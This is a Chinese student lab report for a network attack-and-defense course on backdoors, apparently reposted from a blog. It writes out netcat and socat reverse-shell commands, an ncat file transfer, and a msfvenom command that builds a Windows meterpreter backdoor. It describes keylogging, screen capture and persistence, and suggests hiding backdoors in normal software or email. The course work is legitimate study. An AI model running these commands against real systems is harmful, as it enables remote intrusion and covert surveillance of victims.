20145335郝昊 《网络对抗》后门原理与实践

20145335郝昊 《网络对抗》后门原理与实践

实验内容

  • 使用netcat和socat获取靶机shell,并实现计划启动;Windows获取Linux的shell和Linux获取Windows的Shell

  • 使用msf-meterpreter生成可执行后门软件并发送给靶机shell,并进行一些命令操作,比如查看ip、查看电脑信息,截屏等功能。

实验步骤与结果

Linux获取Windows的Shell
  • 首先kali虚拟机和靶机都要有ncat,windows中需要下载并安装(注意:在运行的时把目录调整到ncat.exe下)

  • kali下使用ifconfig来获取虚拟机的ip

  • 在虚拟机使用 nc -l -p 5335将5335设置成监听端口。在windows下使用命令netcat.exe -e cmd 172.30.5.159 5335

884698-20170315215706916-748729831.png
884698-20170315220356932-1088755708.png

884698-20170315215719463-1306705477.png

windows下获取Linux的Shell

  • windows下使用命令 netcat.exe 172.30.5.159 5335监听

  • kali下使用nc -e /bin/sh -l -p 5335反弹连接

  • 之后在windows下使用命令ifconfig命令进行验证

884698-20170315215739073-2131304973.png

884698-20170315215751370-1948172759.png

ncat传输文件

  • windows使用命令 ncat.exe -lv 1453 > Hfile.exe

  • kali下使用命令ncat -nv 172.30.3.151 1453 <pwnx
    884698-20170315215806698-175627392.png

socat获取主机shell

  • windows利用socat获取kali的shell:

  • 在kali虚拟机上使用socat tcp-listen:5335

  • 同時用socat tcp-l:5335 system:bash,pty,stderr反弹连接

  • windows使用socat readline tcp:172.30.5.159 5335开启监听

  • 成功,使用ifconfig检测

884698-20170315215826776-1598335093.png
884698-20170315215835791-1848459471.png

meterpreter后门程序

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=169.254.161.25 LPORT=208 -f exe >20145335.exe来生成后门程序,然后发送到windows机中。

884698-20170315215918151-1981275972.png

  • 开启msf设置
    884698-20170315215928635-1244198037.png

  • meterpreter信息收集
    884698-20170315215940432-315023071.png

  • 查看系统版本信息
    884698-20170315215950823-1709412913.png

  • 对靶机进行截图

884698-20170315220004166-964424069.png
884698-20170315220012120-2041697377.png
884698-20170315220021260-33364651.png

  • 记录键盘输入

884698-20170315220032198-1828379130.png

  • 后门程序启动
    884698-20170315220044041-833296820.png
    884698-20170315220052620-151905313.png
    884698-20170315220100260-1788825012.png

实验遇到的问题

  • 第一在使用ifconfig命令查看kali的ip地址时候看错了地址,如下图
    884698-20170315220113870-1689827238.png

    应该是172.30.5.159,错看成了广播地址,172.30.7.255导致在做实验的时候遇到了问题

  • 在完成meterpreter后门实验的时候,生成了后门软件,但是在靶机中无法正常运行程序,双击之后程序没有任何反应。后来解决办法是右键,以管理员身份运行,就可以用任务管理器查看出后满软件是否在运行。
    884698-20170315220142870-852677179.png

实验思考

  • 如何将一个后台软件安装到系统中?

    第一可以将后天软件包装在一个正常的软件中,因为通过实验可以发现后门软件内存非常小,完全不会注意到其存在。

    第二可以将后天软件负载到邮件等传播文件中,这样就可以安装到系统中。

  • 后门软件如何启动

    在以上的实验过程中可以windows中可以使用任务启动计划,可以设置相应的条件,如开机时,休眠时,启动某项软件时;Linux中设置cron来完成。

  • meterpreter有哪些给你印象深刻的功能?

    第一,因为是第一次接触后门软件,截图功能给我留下了深刻印象。因为截图可以看到整个电脑屏幕的现状,从而不仅可以获得电脑信息,还可以分析出一个人用电脑的习惯,譬如喜欢全屏操作还是喜欢半屏操作等等。

    第二是键盘记录,在做实验中,我在靶机中没有打开任何软件,只是单纯的在桌面下敲击键盘,然而metrerpreter也能记录出敲击顺序。
  • 如何发现系统有后门软件

    如果发现自己的比较私密的信息会突然出现在不该出现的场合,或者电脑的cpu会猛增,都会可能是后门软件在后台执行。

转载于:https://www.cnblogs.com/20145335hh/p/6556931.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值